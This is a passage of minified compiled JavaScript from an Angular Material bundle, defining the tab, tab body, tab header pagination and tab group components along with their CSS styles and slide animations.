new(e||t)(Ee(ho),Ee(fo),Ee(TF,8))},t.\u0275dir=Ot({type:t,selectors:[["","mat-tab-label",""],["","matTabLabel",""]],features:[ki([{provide:AF,useExisting:t}]),ci]}),t})();const u0e=Zc(class{}),EF=new ni("MAT_TAB_GROUP");let Mu=(()=>{class t extends u0e{constructor(e,i){super(),this._viewContainerRef=e,this._closestTabGroup=i,this.textLabel="",this._contentPortal=null,this._stateChanges=new J,this.position=null,this.origin=null,this.isActive=!1}get templateLabel(){return this._templateLabel}set templateLabel(e){this._setTemplateLabelInput(e)}get content(){return this._contentPortal}ngOnChanges(e){(e.hasOwnProperty("textLabel")||e.hasOwnProperty("disabled"))&&this._stateChanges.next()}ngOnDestroy(){this._stateChanges.complete()}ngOnInit(){this._contentPortal=new Mm(this._explicitContent||this._implicitContent,this._viewContainerRef)}_setTemplateLabelInput(e){e&&e._closestTab===this&&(this._templateLabel=e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(EF,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-tab"]],contentQueries:function(e,i,n){if(1&e&&(fa(n,AF,5),fa(n,vF,7,ho)),2&e){let r;Vt(r=Bt())&&(i.templateLabel=r.first),Vt(r=Bt())&&(i._explicitContent=r.first)}},viewQuery:function(e,i){if(1&e&&Mi(ho,7),2&e){let n;Vt(n=Bt())&&(i._implicitContent=n.first)}},inputs:{disabled:"disabled",textLabel:["label","textLabel"],ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],labelClass:"labelClass",bodyClass:"bodyClass"},exportAs:["matTab"],features:[ki([{provide:TF,useExisting:t}]),ci,sa],ngContentSelectors:bF,decls:1,vars:0,template:function(e,i){1&e&&(Jn(),ne(0,$ge,1,0,"ng-template"))},encapsulation:2}),t})();const h0e={translateTab:nr("translateTab",[sn("center, void, left-origin-center, right-origin-center",zi({transform:"none"})),sn("left",zi({transform:"translate3d(-100%, 0, 0)",minHeight:"1px",visibility:"hidden"})),sn("right",zi({transform:"translate3d(100%, 0, 0)",minHeight:"1px",visibility:"hidden"})),gn("* => left, * => right, left => center, right => center",En("{{animationDuration}} cubic-bezier(0.35, 0, 0.25, 1)")),gn("void => left-origin-center",[zi({transform:"translate3d(-100%, 0, 0)",visibility:"hidden"}),En("{{animationDuration}} cubic-bezier(0.35, 0, 0.25, 1)")]),gn("void => right-origin-center",[zi({transform:"translate3d(100%, 0, 0)",visibility:"hidden"}),En("{{animationDuration}} cubic-bezier(0.35, 0, 0.25, 1)")])])};let f0e=(()=>{class t extends Cu{constructor(e,i,n,r){super(e,i,r),this._host=n,this._centeringSub=I.EMPTY,this._leavingSub=I.EMPTY}ngOnInit(){super.ngOnInit(),this._centeringSub=this._host._beforeCentering.pipe(Ro(this._host._isCenterPosition(this._host._position))).subscribe(e=>{e&&!this.hasAttached()&&this.attach(this._host._content)}),this._leavingSub=this._host._afterLeavingCenter.subscribe(()=>{this._host.preserveContent||this.detach()})}ngOnDestroy(){super.ngOnDestroy(),this._centeringSub.unsubscribe(),this._leavingSub.unsubscribe()}}return t.\u0275fac=function(e){return new(e||t)(Ee(On),Ee(fo),Ee(ja(()=>DF)),Ee(ga))},t.\u0275dir=Ot({type:t,selectors:[["","matTabBodyHost",""]],features:[ci]}),t})(),p0e=(()=>{class t{constructor(e,i,n){this._elementRef=e,this._dir=i,this._dirChangeSubscription=I.EMPTY,this._translateTabComplete=new J,this._onCentering=new Tt,this._beforeCentering=new Tt,this._afterLeavingCenter=new Tt,this._onCentered=new Tt(!0),this.animationDuration="500ms",this.preserveContent=!1,i&&(this._dirChangeSubscription=i.change.subscribe(r=>{this._computePositionAnimationState(r),n.markForCheck()})),this._translateTabComplete.pipe(Bh((r,c)=>r.fromState===c.fromState&&r.toState===c.toState)).subscribe(r=>{this._isCenterPosition(r.toState)&&this._isCenterPosition(this._position)&&this._onCentered.emit(),this._isCenterPosition(r.fromState)&&!this._isCenterPosition(this._position)&&this._afterLeavingCenter.emit()})}set position(e){this._positionIndex=e,this._computePositionAnimationState()}ngOnInit(){"center"==this._position&&null!=this.origin&&(this._position=this._computePositionFromOrigin(this.origin))}ngOnDestroy(){this._dirChangeSubscription.unsubscribe(),this._translateTabComplete.complete()}_onTranslateTabStarted(e){const i=this._isCenterPosition(e.toState);this._beforeCentering.emit(i),i&&this._onCentering.emit(this._elementRef.nativeElement.clientHeight)}_getLayoutDirection(){return this._dir&&"rtl"===this._dir.value?"rtl":"ltr"}_isCenterPosition(e){return"center"==e||"left-origin-center"==e||"right-origin-center"==e}_computePositionAnimationState(e=this._getLayoutDirection()){this._position=this._positionIndex<0?"ltr"==e?"left":"right":this._positionIndex>0?"ltr"==e?"right":"left":"center"}_computePositionFromOrigin(e){const i=this._getLayoutDirection();return"ltr"==i&&e<=0||"rtl"==i&&e>0?"left-origin-center":"right-origin-center"}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Cr,8),Ee(Ma))},t.\u0275dir=Ot({type:t,inputs:{_content:["content","_content"],origin:"origin",animationDuration:"animationDuration",preserveContent:"preserveContent",position:"position"},outputs:{_onCentering:"_onCentering",_beforeCentering:"_beforeCentering",_afterLeavingCenter:"_afterLeavingCenter",_onCentered:"_onCentered"}}),t})(),DF=(()=>{class t extends p0e{constructor(e,i,n){super(e,i,n)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Cr,8),Ee(Ma))},t.\u0275cmp=Wt({type:t,selectors:[["mat-tab-body"]],viewQuery:function(e,i){if(1&e&&Mi(Cu,5),2&e){let n;Vt(n=Bt())&&(i._portalHost=n.first)}},hostAttrs:[1,"mat-tab-body"],features:[ci],decls:3,vars:6,consts:[["cdkScrollable","",1,"mat-tab-body-content"],["content",""],["matTabBodyHost",""]],template:function(e,i){1&e&&(m(0,"div",0,1),he("@translateTab.start",function(r){return i._onTranslateTabStarted(r)})("@translateTab.done",function(r){return i._translateTabComplete.next(r)}),ne(2,Kge,0,0,"ng-template",2),u()),2&e&&F("@translateTab",Ah(3,Yge,i._position,fr(1,Xge,i.animationDuration)))},dependencies:[f0e],styles:['.mat-tab-body-content{height:100%;overflow:auto}.mat-tab-group-dynamic-height .mat-tab-body-content{overflow:hidden}.mat-tab-body-content[style*="visibility: hidden"]{display:none}'],encapsulation:2,data:{animation:[h0e.translateTab]}}),t})();const xF=new ni("MAT_TABS_CONFIG"),_0e=Zc(class{});let wF=(()=>{class t extends _0e{constructor(e){super(),this.elementRef=e}focus(){this.elementRef.nativeElement.focus()}getOffsetLeft(){return this.elementRef.nativeElement.offsetLeft}getOffsetWidth(){return this.elementRef.nativeElement.offsetWidth}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","matTabLabelWrapper",""]],hostVars:3,hostBindings:function(e,i){2&e&&(Rt("aria-disabled",!!i.disabled),Ct("mat-tab-disabled",i.disabled))},inputs:{disabled:"disabled"},features:[ci]}),t})();const IF=ym({passive:!0});let y0e=(()=>{class t{constructor(e,i,n,r,c,d,T){this._elementRef=e,this._changeDetectorRef=i,this._viewportRuler=n,this._dir=r,this._ngZone=c,this._platform=d,this._animationMode=T,this._scrollDistance=0,this._selectedIndexChanged=!1,this._destroyed=new J,this._showPaginationControls=!1,this._disableScrollAfter=!0,this._disableScrollBefore=!0,this._stopScrolling=new J,this._disablePagination=!1,this._selectedIndex=0,this.selectFocusedIndex=new Tt,this.indexFocused=new Tt,c.runOutsideAngular(()=>{Tc(e.nativeElement,"mouseleave").pipe(ea(this._destroyed)).subscribe(()=>{this._stopInterval()})})}get disablePagination(){return this._disablePagination}set disablePagination(e){this._disablePagination=wi(e)}get selectedIndex(){return this._selectedIndex}set selectedIndex(e){e=Uo(e),this._selectedIndex!=e&&(this._selectedIndexChanged=!0,this._selectedIndex=e,this._keyManager&&this._keyManager.updateActiveItem(e))}ngAfterViewInit(){Tc(this._previousPaginator.nativeElement,"touchstart",IF).pipe(ea(this._destroyed)).subscribe(()=>{this._handlePaginatorPress("before")}),Tc(this._nextPaginator.nativeElement,"touchstart",IF).pipe(ea(this._destroyed)).subscribe(()=>{this._handlePaginatorPress("after")})}ngAfterContentInit(){const e=this._dir?this._dir.change:Bi("ltr"),i=this._viewportRuler.change(150),n=()=>{this.updatePagination(),this._alignInkBarToSelectedTab()};this._keyManager=new L1(this._items).withHorizontalOrientation(this._getLayoutDirection()).withHomeAndEnd().withWrap(),this._keyManager.updateActiveItem(this._selectedIndex),this._ngZone.onStable.pipe(Cn(1)).subscribe(n),ra(e,i,this._items.changes,this._itemsResized()).pipe(ea(this._destroyed)).subscribe(()=>{this._ngZone.run(()=>{Promise.resolve().then(()=>{this._scrollDistance=Math.max(0,Math.min(this._getMaxScrollDistance(),this._scrollDistance)),n()})}),this._keyManager.withHorizontalOrientation(this._getLayoutDirection())}),this._keyManager.change.pipe(ea(this._destroyed)).subscribe(r=>{this.indexFocused.emit(r),this._setTabFocus(r)})}_itemsResized(){return"function"!=typeof ResizeObserver?ha:this._items.changes.pipe(Ro(this._items),Ur(e=>new G(i=>this._ngZone.runOutsideAngular(()=>{const n=new ResizeObserver(()=>{i.next()});return e.forEach(r=>{n.observe(r.elementRef.nativeElement)}),()=>{n.disconnect()}}))),Sw(1))}ngAfterContentChecked(){this._tabLabelCount!=this._items.length&&(this.updatePagination(),this._tabLabelCount=this._items.length,this._changeDetectorRef.markForCheck()),this._selectedIndexChanged&&(this._scrollToLabel(this._selectedIndex),this._checkScrollingControls(),this._alignInkBarToSelectedTab(),this._selectedIndexChanged=!1,this._changeDetectorRef.markForCheck()),this._scrollDistanceChanged&&(this._updateTabScrollPosition(),this._scrollDistanceChanged=!1,this._changeDetectorRef.markForCheck())}ngOnDestroy(){this._destroyed.next(),this._destroyed.complete(),this._stopScrolling.complete()}_handleKeydown(e){if(!es(e))switch(e.keyCode){case 13:case 32:this.focusIndex!==this.selectedIndex&&(this.selectFocusedIndex.emit(this.focusIndex),this._itemSelected(e));break;default:this._keyManager.onKeydown(e)}}_onContentChanges(){const e=this._elementRef.nativeElement.textContent;e!==this._currentTextContent&&(this._currentTextContent=e||"",this._ngZone.run(()=>{this.updatePagination(),this._alignInkBarToSelectedTab(),this._changeDetectorRef.markForCheck()}))}updatePagination(){this._checkPaginationEnabled(),this._checkScrollingControls(),this._updateTabScrollPosition()}get focusIndex(){return this._keyManager?this._keyManager.activeItemIndex:0}set focusIndex(e){!this._isValidIndex(e)||this.focusIndex===e||!this._keyManager||this._keyManager.setActiveItem(e)}_isValidIndex(e){if(!this._items)return!0;const i=this._items?this._items.toArray()[e]:null;return!!i&&!i.disabled}_setTabFocus(e){if(this._showPaginationControls&&this._scrollToLabel(e),this._items&&this._items.length){this._items.toArray()[e].focus();const i=this._tabListContainer.nativeElement;i.scrollLeft="ltr"==this._getLayoutDirection()?0:i.scrollWidth-i.offsetWidth}}_getLayoutDirection(){return this._dir&&"rtl"===this._dir.value?"rtl":"ltr"}_updateTabScrollPosition(){if(this.disablePagination)return;const e=this.scrollDistance,i="ltr"===this._getLayoutDirection()?-e:e;this._tabList.nativeElement.style.transform=`translateX(${Math.round(i)}px)`,(this._platform.TRIDENT||this._platform.EDGE)&&(this._tabListContainer.nativeElement.scrollLeft=0)}get scrollDistance(){return this._scrollDistance}set scrollDistance(e){this._scrollTo(e)}_scrollHeader(e){return this._scrollTo(this._scrollDistance+("before"==e?-1:1)*this._tabListContainer.nativeElement.offsetWidth/3)}_handlePaginatorClick(e){this._stopInterval(),this._scrollHeader(e)}_scrollToLabel(e){if(this.disablePagination)return;const i=this._items?this._items.toArray()[e]:null;if(!i)return;const n=this._tabListContainer.nativeElement.offsetWidth,{offsetLeft:r,offsetWidth:c}=i.elementRef.nativeElement;let d,T;"ltr"==this._getLayoutDirection()?(d=r,T=d+c):(T=this._tabListInner.nativeElement.offsetWidth-r,d=T-c);const k=this.scrollDistance,q=this.scrollDistance+n;dq&&(this.scrollDistance+=T-q+60)}_checkPaginationEnabled(){if(this.disablePagination)this._showPaginationControls=!1;else{const e=this._tabListInner.nativeElement.scrollWidth>this._elementRef.nativeElement.offsetWidth;e||(this.scrollDistance=0),e!==this._showPaginationControls&&this._changeDetectorRef.markForCheck(),this._showPaginationControls=e}}_checkScrollingControls(){this.disablePagination?this._disableScrollAfter=this._disableScrollBefore=!0:(this._disableScrollBefore=0==this.scrollDistance,this._disableScrollAfter=this.scrollDistance==this._getMaxScrollDistance(),this._changeDetectorRef.markForCheck())}_getMaxScrollDistance(){return this._tabListInner.nativeElement.scrollWidth-this._tabListContainer.nativeElement.offsetWidth||0}_alignInkBarToSelectedTab(){const e=this._items&&this._items.length?this._items.toArray()[this.selectedIndex]:null,i=e?e.elementRef.nativeElement:null;i?this._inkBar.alignToElement(i):this._inkBar.hide()}_stopInterval(){this._stopScrolling.next()}_handlePaginatorPress(e,i){i&&null!=i.button&&0!==i.button||(this._stopInterval(),M3(650,100).pipe(ea(ra(this._stopScrolling,this._destroyed))).subscribe(()=>{const{maxScrollDistance:n,distance:r}=this._scrollHeader(e);(0===r||r>=n)&&this._stopInterval()}))}_scrollTo(e){if(this.disablePagination)return{maxScrollDistance:0,distance:0};const i=this._getMaxScrollDistance();return this._scrollDistance=Math.max(0,Math.min(i,e)),this._scrollDistanceChanged=!0,this._checkScrollingControls(),{maxScrollDistance:i,distance:this._scrollDistance}}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(bm),Ee(Cr,8),Ee(qi),Ee(cr),Ee(ar,8))},t.\u0275dir=Ot({type:t,inputs:{disablePagination:"disablePagination"}}),t})(),b0e=(()=>{class t extends y0e{constructor(e,i,n,r,c,d,T){super(e,i,n,r,c,d,T),this._disableRipple=!1}get disableRipple(){return this._disableRipple}set disableRipple(e){this._disableRipple=wi(e)}_itemSelected(e){e.preventDefault()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(bm),Ee(Cr,8),Ee(qi),Ee(cr),Ee(ar,8))},t.\u0275dir=Ot({type:t,inputs:{disableRipple:"disableRipple"},features:[ci]}),t})(),M0e=(()=>{class t extends b0e{constructor(e,i,n,r,c,d,T){super(e,i,n,r,c,d,T)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(bm),Ee(Cr,8),Ee(qi),Ee(cr),Ee(ar,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-tab-header"]],contentQueries:function(e,i,n){if(1&e&&fa(n,wF,4),2&e){let r;Vt(r=Bt())&&(i._items=r)}},viewQuery:function(e,i){if(1&e&&(Mi(MF,7),Mi(Jge,7),Mi(Zge,7),Mi(e0e,7),Mi(t0e,5),Mi(i0e,5)),2&e){let n;Vt(n=Bt())&&(i._inkBar=n.first),Vt(n=Bt())&&(i._tabListContainer=n.first),Vt(n=Bt())&&(i._tabList=n.first),Vt(n=Bt())&&(i._tabListInner=n.first),Vt(n=Bt())&&(i._nextPaginator=n.first),Vt(n=Bt())&&(i._previousPaginator=n.first)}},hostAttrs:[1,"mat-tab-header"],hostVars:4,hostBindings:function(e,i){2&e&&Ct("mat-tab-header-pagination-controls-enabled",i._showPaginationControls)("mat-tab-header-rtl","rtl"==i._getLayoutDirection())},inputs:{selectedIndex:"selectedIndex"},outputs:{selectFocusedIndex:"selectFocusedIndex",indexFocused:"indexFocused"},features:[ci],ngContentSelectors:bF,decls:14,vars:10,consts:[["aria-hidden","true","type","button","mat-ripple","","tabindex","-1",1,"mat-tab-header-pagination","mat-tab-header-pagination-before","mat-elevation-z4",3,"matRippleDisabled","disabled","click","mousedown","touchend"],["previousPaginator",""],[1,"mat-tab-header-pagination-chevron"],[1,"mat-tab-label-container",3,"keydown"],["tabListContainer",""],["role","tablist",1,"mat-tab-list",3,"cdkObserveContent"],["tabList",""],[1,"mat-tab-labels"],["tabListInner",""],["aria-hidden","true","type","button","mat-ripple","","tabindex","-1",1,"mat-tab-header-pagination","mat-tab-header-pagination-after","mat-elevation-z4",3,"matRippleDisabled","disabled","mousedown","click","touchend"],["nextPaginator",""]],template:function(e,i){1&e&&(Jn(),m(0,"button",0,1),he("click",function(){return i._handlePaginatorClick("before")})("mousedown",function(r){return i._handlePaginatorPress("before",r)})("touchend",function(){return i._stopInterval()}),it(2,"div",2),u(),m(3,"div",3,4),he("keydown",function(r){return i._handleKeydown(r)}),m(5,"div",5,6),he("cdkObserveContent",function(){return i._onContentChanges()}),m(7,"div",7,8),va(9),u(),it(10,"mat-ink-bar"),u()(),m(11,"button",9,10),he("mousedown",function(r){return i._handlePaginatorPress("after",r)})("click",function(){return i._handlePaginatorClick("after")})("touchend",function(){return i._stopInterval()}),it(13,"div",2),u()),2&e&&(Ct("mat-tab-header-pagination-disabled",i._disableScrollBefore),F("matRippleDisabled",i._disableScrollBefore||i.disableRipple)("disabled",i._disableScrollBefore||null),g(5),Ct("_mat-animation-noopable","NoopAnimations"===i._animationMode),g(6),Ct("mat-tab-header-pagination-disabled",i._disableScrollAfter),F("matRippleDisabled",i._disableScrollAfter||i.disableRipple)("disabled",i._disableScrollAfter||null))},dependencies:[Dl,P3,MF],styles:[".mat-tab-header{display:flex;overflow:hidden;position:relative;flex-shrink:0}.mat-tab-header-pagination{-webkit-user-select:none;user-select:none;position:relative;display:none;justify-content:center;align-items:center;min-width:32px;cursor:pointer;z-index:2;-webkit-tap-highlight-color:rgba(0,0,0,0);touch-action:none;box-sizing:content-box;background:none;border:none;outline:0;padding:0}.mat-tab-header-pagination::-moz-focus-inner{border:0}.mat-tab-header-pagination-controls-enabled .mat-tab-header-pagination{display:flex}.mat-tab-header-pagination-before,.mat-tab-header-rtl .mat-tab-header-pagination-after{padding-left:4px}.mat-tab-header-pagination-before .mat-tab-header-pagination-chevron,.mat-tab-header-rtl .mat-tab-header-pagination-after .mat-tab-header-pagination-chevron{transform:rotate(-135deg)}.mat-tab-header-rtl .mat-tab-header-pagination-before,.mat-tab-header-pagination-after{padding-right:4px}.mat-tab-header-rtl .mat-tab-header-pagination-before .mat-tab-header-pagination-chevron,.mat-tab-header-pagination-after .mat-tab-header-pagination-chevron{transform:rotate(45deg)}.mat-tab-header-pagination-chevron{border-style:solid;border-width:2px 2px 0 0;height:8px;width:8px}.mat-tab-header-pagination-disabled{box-shadow:none;cursor:default}.mat-tab-list{flex-grow:1;position:relative;transition:transform 500ms cubic-bezier(0.35, 0, 0.25, 1)}.mat-ink-bar{position:absolute;bottom:0;height:2px;transition:500ms cubic-bezier(0.35, 0, 0.25, 1)}.mat-ink-bar._mat-animation-noopable{transition:none !important;animation:none !important}.mat-tab-group-inverted-header .mat-ink-bar{bottom:auto;top:0}.cdk-high-contrast-active .mat-ink-bar{outline:solid 2px;height:0}.mat-tab-labels{display:flex}[mat-align-tabs=center]>.mat-tab-header .mat-tab-labels{justify-content:center}[mat-align-tabs=end]>.mat-tab-header .mat-tab-labels{justify-content:flex-end}.mat-tab-label-container{display:flex;flex-grow:1;overflow:hidden;z-index:1}.mat-tab-list._mat-animation-noopable{transition:none !important;animation:none !important}.mat-tab-label{height:48px;padding:0 24px;cursor:pointer;box-sizing:border-box;opacity:.6;min-width:160px;text-align:center;display:inline-flex;justify-content:center;align-items:center;white-space:nowrap;position:relative}.mat-tab-label:focus{outline:none}.mat-tab-label:focus:not(.mat-tab-disabled){opacity:1}.mat-tab-label.mat-tab-disabled{cursor:default}.cdk-high-contrast-active .mat-tab-label.mat-tab-disabled{opacity:.5}.mat-tab-label .mat-tab-label-content{display:inline-flex;justify-content:center;align-items:center;white-space:nowrap}.cdk-high-contrast-active .mat-tab-label{opacity:1}.mat-tab-label::before{margin:5px}@media(max-width: 599px){.mat-tab-label{min-width:72px}}"],encapsulation:2}),t})(),v0e=0;class A0e{}const T0e=Pd(El(class{constructor(t){this._elementRef=t}}),"primary");let E0e=(()=>{class t extends T0e{constructor(e,i,n,r){var c;super(e),this._changeDetectorRef=i,this._animationMode=r,this._tabs=new Cd,this._indexToSelect=0,this._lastFocusedTabIndex=null,this._tabBodyWrapperHeight=0,this._tabsSubscription=I.EMPTY,this._tabLabelSubscription=I.EMPTY,this._dynamicHeight=!1,this._selectedIndex=null,this.headerPosition="above",this._disablePagination=!1,this._preserveContent=!1,this.selectedIndexChange=new Tt,this.focusChange=new Tt,this.animationDone=new Tt,this.selectedTabChange=new Tt(!0),this._groupId=v0e++,this.animationDuration=n&&n.animationDuration?n.animationDuration:"500ms",this.disablePagination=!(!n||null==n.disablePagination)&&n.disablePagination,this.dynamicHeight=!(!n||null==n.dynamicHeight)&&n.dynamicHeight,this.contentTabIndex=null!==(c=null==n?void 0:n.contentTabIndex)&&void 0!==c?c:null,this.preserveContent=!(null==n||!n.preserveContent)}get dynamicHeight(){return this._dynamicHeight}set dynamicHeight(e){this._dynamicHeight=wi(e)}get selectedIndex(){return this._selectedIndex}set selectedIndex(e){this._indexToSelect=Uo(e,null)}get animationDuration(){return this._animationDuration}set animationDuration(e){this._animationDuration=/^\d+$/.test(e+"")?e+"ms":e}get contentTabIndex(){return this._contentTabIndex}set contentTabIndex(e){this._contentTabIndex=Uo(e,null)}get disablePagination(){return this._disablePagination}set disablePagination(e){this._disablePagination=wi(e)}get preserveContent(){return this._preserveContent}set preserveContent(e){this._preserveContent=wi(e)}get backgroundColor(){return this._backgroundColor}set backgroundColor(e){const i=this._elementRef.nativeElement;i.classList.remove(`mat-background-${this.backgroundColor}`),e&&i.classList.add(`mat-background-${e}`),this._backgroundColor=e}ngAfterContentChecked(){const e=this._indexToSelect=this._clampTabIndex(this._indexToSelect);if(this._selectedIndex!=e){const i=null==this._selectedIndex;if(!i){this.selectedTabChange.emit(this._createChangeEvent(e));const n=this._tabBodyWrapper.nativeElement;n.style.minHeight=n.clientHeight+"px"}Promise.resolve().then(()=>{this._tabs.forEach((n,r)=>n.isActive=r===e),i||(this.selectedIndexChange.emit(e),this._tabBodyWrapper.nativeElement.style.minHeight="")})}this._tabs.forEach((i,n)=>{i.position=n-e,null!=this._selectedIndex&&0==i.position&&!i.origin&&(i.origin=e-this._selectedIndex)}),this._selectedIndex!==e&&(this._selectedIndex=e,this._lastFocusedTabIndex=null,this._changeDetectorRef.markForCheck())}ngAfterContentInit(){this._subscribeToAllTabChanges(),this._subscribeToTabLabels(),this._tabsSubscription=this._tabs.changes.subscribe(()=>{const e=this._clampTabIndex(this._indexToSelect);if(e===this._selectedIndex){const i=this._tabs.toArray();let n;for(let r=0;r{i[e].isActive=!0,this.selectedTabChange.emit(this._createChangeEvent(e))})}this._changeDetectorRef.markForCheck()})}_subscribeToAllTabChanges(){this._allTabs.changes.pipe(Ro(this._allTabs)).subscribe(e=>{this._tabs.reset(e.filter(i=>i._closestTabGroup===this||!i._closestTabGroup)),this._tabs.notifyOnChanges()})}ngOnDestroy(){this._tabs.destroy(),this._tabsSubscription.unsubscribe(),this._tabLabelSubscription.unsubscribe()}realignInkBar(){this._tabHeader&&this._tabHeader._alignInkBarToSelectedTab()}updatePagination(){this._tabHeader&&this._tabHeader.updatePagination()}focusTab(e){const i=this._tabHeader;i&&(i.focusIndex=e)}_focusChanged(e){this._lastFocusedTabIndex=e,this.focusChange.emit(this._createChangeEvent(e))}_createChangeEvent(e){const i=new A0e;return i.index=e,this._tabs&&this._tabs.length&&(i.tab=this._tabs.toArray()[e]),i}_subscribeToTabLabels(){this._tabLabelSubscription&&this._tabLabelSubscription.unsubscribe(),this._tabLabelSubscription=ra(...this._tabs.map(e=>e._stateChanges)).subscribe(()=>this._changeDetectorRef.markForCheck())}_clampTabIndex(e){return Math.min(this._tabs.length-1,Math.max(e||0,0))}_getTabLabelId(e){return`mat-tab-label-${this._groupId}-${e}`}_getTabContentId(e){return`mat-tab-content-${this._groupId}-${e}`}_setTabBodyWrapperHeight(e){if(!this._dynamicHeight||!this._tabBodyWrapperHeight)return;const i=this._tabBodyWrapper.nativeElement;i.style.height=this._tabBodyWrapperHeight+"px",this._tabBodyWrapper.nativeElement.offsetHeight&&(i.style.height=e+"px")}_removeTabBodyWrapperHeight(){const e=this._tabBodyWrapper.nativeElement;this._tabBodyWrapperHeight=e.clientHeight,e.style.height="",this.animationDone.emit()}_handleClick(e,i,n){e.disabled||(this.selectedIndex=i.focusIndex=n)}_getTabIndex(e,i){var n;return e.disabled?null:i===(null!==(n=this._lastFocusedTabIndex)&&void 0!==n?n:this.selectedIndex)?0:-1}_tabFocusChanged(e,i){e&&"mouse"!==e&&"touch"!==e&&(this._tabHeader.focusIndex=i)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(xF,8),Ee(ar,8))},t.\u0275dir=Ot({type:t,inputs:{dynamicHeight:"dynamicHeight",selectedIndex:"selectedIndex",headerPosition:"headerPosition",animationDuration:"animationDuration",contentTabIndex:"contentTabIndex",disablePagination:"disablePagination",preserveContent:"preserveContent",backgroundColor:"backgroundColor"},outputs:{selectedIndexChange:"selectedIndexChange",focusChange:"focusChange",animationDone:"animationDone",selectedTabChange:"selectedTabChange"},features:[ci]}),t})(),qh=(()=>{class t extends E0e{constructor(e,i,n,r){super(e,i,n,r)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(xF,8),Ee(ar,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-tab-group"]],contentQueries:function(e,i,n){if(1&e&&fa(n,Mu,5),2&e){let r;Vt(r=Bt())&&(i._allTabs=r)}},viewQuery:function(e,i){if(1&e&&(Mi(a0e,5),Mi(n0e,5)),2&e){let n;Vt(n=Bt())&&(i._tabBodyWrapper=n.first),Vt(n=Bt())&&(i._tabHeader=n.first)}},hostAttrs:[1,"mat-tab-group"],hostVars:4,hostBindings:function(e,i){2&e&&Ct("mat-tab-group-dynamic-height",i.dynamicHeight)("mat-tab-group-inverted-header","below"===i.headerPosition)},inputs:{color:"color",disableRipple:"disableRipple"},exportAs:["matTabGroup"],features:[ki([{provide:EF,useExisting:t}]),ci],decls:6,vars:7,consts:[[3,"selectedIndex","disableRipple","disablePagination","indexFocused","selectFocusedIndex"],["tabHeader",""],["class","mat-tab-label mat-focus-indicator","role","tab","matTabLabelWrapper","","mat-ripple","","cdkMonitorElementFocus","",3,"id","mat-tab-label-active","ngClass","disabled","matRippleDisabled","click","cdkFocusChange",4,"ngFor","ngForOf"],[1,"mat-tab-body-wrapper"],["tabBodyWrapper",""],["role","tabpanel",3,"id","mat-tab-body-active","ngClass","content","position","origin","animationDuration","preserveContent","_onCentered","_onCentering",4,"ngFor","ngForOf"],["role","tab","matTabLabelWrapper","","mat-ripple","","cdkMonitorElementFocus","",1,"mat-tab-label","mat-focus-indicator",3,"id","ngClass","disabled","matRippleDisabled","click","cdkFocusChange"],[1,"mat-tab-label-content"],[3,"ngIf","ngIfElse"],["tabTextLabel",""],[3,"cdkPortalOutlet"],["role","tabpanel",3,"id","ngClass","content","position","origin","animationDuration","preserveContent","_onCentered","_onCentering"]],template:function(e,i){1&e&&(m(0,"mat-tab-header",0,1),he("indexFocused",function(r){return i._focusChanged(r)})("selectFocusedIndex",function(r){return i.selectedIndex=r}),ne(2,c0e,5,15,"div",2),u(),m(3,"div",3,4),ne(5,l0e,1,11,"mat-tab-body",5),u()),2&e&&(F("selectedIndex",i.selectedIndex||0)("disableRipple",i.disableRipple)("disablePagination",i.disablePagination),g(2),F("ngForOf",i._tabs),g(1),Ct("_mat-animation-noopable","NoopAnimations"===i._animationMode),g(2),F("ngForOf",i._tabs))},dependencies:[ig,Zi,Ri,Cu,Dl,lpe,wF,DF,M0e],styles:[".mat-tab-group{display:flex;flex-direction:column;max-width:100%}.mat-tab-group.mat-tab-group-inverted-header{flex-direction:column-reverse}.mat-tab-label{height:48px;padding:0 24px;cursor:pointer;box-sizing:border-box;opacity:.6;min-width:160px;text-align:center;display:inline-flex;justify-content:center;align-items:center;white-space:nowrap;position:relative}.mat-tab-label:focus{outline:none}.mat-tab-label:focus:not(.mat-tab-disabled){opacity:1}.mat-tab-label.mat-tab-disabled{cursor:default}.cdk-high-contrast-active .mat-tab-label.mat-tab-disabled{opacity:.5}.mat-tab-label .mat-tab-label-content{display:inline-flex;justify-content:center;align-items:center;white-space:nowrap}.cdk-high-contrast-active .mat-tab-label{opacity:1}@media(max-width: 599px){.mat-tab-label{padding:0 12px}}@media(max-width: 959px){.mat-tab-label{padding:0 12px}}.mat-tab-group[mat-stretch-tabs]>.mat-tab-header .mat-tab-label{flex-basis:0;flex-grow:1}.mat-tab-body-wrapper{position:relative;overflow:hidden;display:flex;transition:height 500ms cubic-bezier(0.35, 0, 0.25, 1)}.mat-tab-body-wrapper._mat-animation-noopable{transition:none !important;animation:none !important}.mat-tab-body{top:0;left:0;right:0;bottom:0;position:absolute;display:block;overflow:hidden;outline:0;flex-basis:100%}.mat-tab-body.mat-tab-body-active{position:relative;overflow-x:hidden;overflow-y:auto;z-index:1;flex-grow:1}.mat-tab-group.mat-tab-group-dynamic-height .mat-tab-body.mat-tab-body-active{overflow-y:hidden}"],encapsulation:2}),t})(),SF=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,la,yu,Od,$y,Xy,la]}),t})();const kF=ym({passive:!0});let D0e=(()=>{class t{constructor(e,i){this._platform=e,this._ngZone=i,this._monitoredElements=new Map}monitor(e){if(!this._platform.isBrowser)return ha;const i=Gr(e),n=this._monitoredElements.get(i);if(n)return n.subject;const r=new 